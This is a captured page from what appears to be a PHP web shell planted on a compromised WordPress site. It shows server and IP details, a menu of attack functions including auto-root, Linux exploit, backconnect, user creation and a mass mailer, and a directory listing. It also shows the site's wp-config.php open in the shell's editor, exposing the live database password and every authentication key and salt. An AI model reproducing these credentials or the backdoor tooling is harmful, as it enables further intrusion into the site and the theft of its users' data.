Linux webserver.lcwhost.net 5.10.0-12-amd64 #1 SMP Debian 5.10.103-1 (2022-03-07) x86_64
LiteSpeed
: 194.163.130.72 | : 216.73.216.224
Cant Read [ /etc/named.conf ]
7.4.33
admin
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
admin /
domains /
lcwhost.co.uk /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
crm
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
8.02
KB
-rw-r--r--
.htaccess.bk
3.6
KB
-rw-r--r--
googleac93301562b5f0fa.html
53
B
-rw-r--r--
h4wdohkso06h7am59kr0lgud9gzg9h...
30
B
-rw-r--r--
index.php
405
B
-rw-r--r--
license.txt
19.44
KB
-rw-r--r--
llms.txt
8.43
KB
-rw-r--r--
readme.html
7.25
KB
-rw-r--r--
wp-activate.php
7.18
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
3.17
KB
-rw-rw-rw-
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.43
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-login.php
50.23
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settings.php
30.33
KB
-rw-r--r--
wp-signup.php
33.71
KB
-rw-r--r--
wp-trackback.php
5.09
KB
-rw-r--r--
xmlrpc.php
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-config.php
<?php define( 'WP_CACHE', true ); define( 'WP_CACHE', false /* Modified by NitroPack */ ); /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'admin_whostcouk' ); /** MySQL database username */ define( 'DB_USER', 'admin_whostcouk' ); /** MySQL database password */ define( 'DB_PASSWORD', 'squirm03eyebar' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'zV)>EUMI(?Tc(ymNGXy$&2CW7x-r:Z*^kGOt^bh1@MGJ4sI0Z5k>8_1Vxz00<spT' ); define( 'SECURE_AUTH_KEY', 'Q!3*BNYBSMjoAn1e+gl`Qm<2R`lVo~*q=XDF[ WfM{xs3:390jN?VqOo^v@TSrcR' ); define( 'LOGGED_IN_KEY', '$xBuWfz}PxkPNu<laTY3Jm%AA[*PD%SK#==d1<}B:L1UZYa|=kV$gJ]r.1/KdFi#' ); define( 'NONCE_KEY', '+{c:lFAVZw!E*QLTB9naI7k(0y=j%zK X/ |9Kw,E:t|qa4;9t8B]grEXrPHXB_o' ); define( 'AUTH_SALT', 'J?p)Fa3w4DMJ`BiH6YO1w!S%LS$~g>Ru*wm++9C7KBF<0( m_rSg,<)H8]s~:tG}' ); define( 'SECURE_AUTH_SALT', 'ajX,T0GBavi>BLC.BraZ-YTmI?Cqvl%(E08@+&f=[qs=1Ccz|/$_;6U6[iKI#fT*' ); define( 'LOGGED_IN_SALT', '.y>;LN57qw{*kfq&v]omp#Eei#(~ci{(UB1.$NsC2wz)M)mrYFS;;K9t9~P>eIhx' ); define( 'NONCE_SALT', 'ZdpA/<qg+T%WR[OZC+XU~H,snn%A>cCDOiT?T],;D]x#a~Xw2R9CR?p.-ejmxLUN' ); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; define('DISALLOW_FILE_EDIT',1); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Close